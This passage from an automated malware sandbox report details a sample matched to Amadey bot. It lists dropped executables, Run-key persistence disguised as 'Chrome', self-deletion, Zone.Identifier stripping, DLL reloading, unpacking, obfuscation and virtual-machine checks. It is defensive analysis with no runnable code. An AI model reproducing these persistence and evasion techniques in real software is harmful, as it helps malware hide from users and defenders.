[Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: C:\Users\user\AppData\Local\Temp\69B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\1254.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\9415.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 25_2_004095FD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
Source: 31F4.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\69B.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1254.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\3C84.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\5483.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\69B.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: F7E3DjYJpC.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: C:\vojos\fuw.pdb source: 20BD.exe, 00000014.00000002.863191806.0000000000417000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 31F4.exe, 00000016.00000002.938495921.0000000003625000.00000004.00000001.sdmp, 31F4.exe, 0000001A.00000000.887030697.0000000000400000.00000040.00000001.sdmp, 31F4.exe, 00000024.00000000.938689458.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.851564916.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp
Source: Binary string: c C:\rudiletama-43\bano.pdbp source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 20BD.exe, 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 20BD.exe
Source: Binary string: C:\rudiletama-43\bano.pdb source: F7E3DjYJpC.exe, 00000000.00000002.687486155.0000000000401000.00000020.00020000.sdmp, F7E3DjYJpC.exe, 00000004.00000000.684695111.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000A.00000002.802540946.0000000000401000.00000020.00020000.sdmp, iwbavbe, 0000000D.00000000.797241999.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000015.00000000.837811542.0000000000401000.00000020.00020000.sdmp, iwbavbe, 00000020.00000000.896222144.0000000000401000.00000020.00020000.sdmp
Source: Binary string: NC:\saxafunadu.pdb source: 9A4B.exe, 0000000B.00000002.794575212.0000000000401000.00000020.00020000.sdmp, 9A4B.exe, 0000000C.00000000.791428821.0000000000401000.00000020.00020000.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Unpacked PE file: 20.2.20BD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Unpacked PE file: 24.2.46D6.exe.400000.0.unpack .text:ER;.data:W;.daya:W;.rsrc:R;.reloc:R; vs .text:EW;
.NET source code contains potential unpacker
Source: 9415.exe.6.dr, SqlGeneratorForm.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E54 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E63 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402665 push cs; ret 20_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_0040290C push eax; iretd 20_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E16 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DC0 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DD8 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DE8 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402DF1 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E82 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E85 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402D92 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E95 push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00401D9A pushad ; ret 20_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_00402E9C push eax; ret 20_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABBD0D1 push ecx; ret 20_2_6ABBD0E4
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Code function: 23_2_00B1CF50 push ss; ret 23_2_00B1CF51
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C328C4 push esp; iretd 24_2_02C328C5
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C31AB1 push ds; retf 24_2_02C31AB9
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C31614 push edx; iretd 24_2_02C31622
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C32728 push ds; retf 24_2_02C3272C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040B50D push ecx; ret 25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_0040B550 push eax; ret 28_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_0040B550 push eax; ret 28_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_0040B50D push ecx; ret 28_2_0040B51D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426900 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426900
Binary contains a suspicious time stamp
Source: 1254.exe.6.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: 5483.exe.6.dr Static PE information: section name: .ziwer
Source: 9A4B.exe.6.dr Static PE information: section name: .lopaba
Source: 20BD.exe.6.dr Static PE information: section name: .cipizi
Source: 16BC.exe.6.dr Static PE information: section name: .nuwomux
Source: 46D6.exe.6.dr Static PE information: section name: .daya
Source: 3D90.exe.6.dr Static PE information: section name: .vinelog
Source: ssbavbe.6.dr Static PE information: section name: .cipizi
PE file contains an invalid checksum
Source: 2CF4.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: 69B.exe.6.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: 3C84.exe.6.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 9415.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x1e70bf
Source: 31F4.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xdd7bb
Source: initial sample Static PE information: section name: .text entropy: 6.97839927821
Source: initial sample Static PE information: section name: .text entropy: 7.87137605191
Source: initial sample Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample Static PE information: section name: .text entropy: 7.67238292604
Source: initial sample Static PE information: section name: .text entropy: 7.0016627071
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.83595599089
Source: initial sample Static PE information: section name: .text entropy: 7.83351783168
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample Static PE information: section name: .text entropy: 7.79655519179

Persistence and Installation Behavior:

Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ssbavbe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\abbavbe
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\69B.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\46D6.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3C84.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe File created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9415.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3D90.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\39A7.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\abbavbe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ssbavbe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5483.exe
Source: C:\Users\user\AppData\Local\Temp\5483.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2CF4.exe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe File created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\31F4.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\20BD.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\1254.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\16BC.exe
Source: C:\Users\user\AppData\Local\Temp\3C84.exe File created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\f7e3djyjpc.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\iwbavbe:Zone.Identifier read attributes | delete
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 25_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\69B.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\9415.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
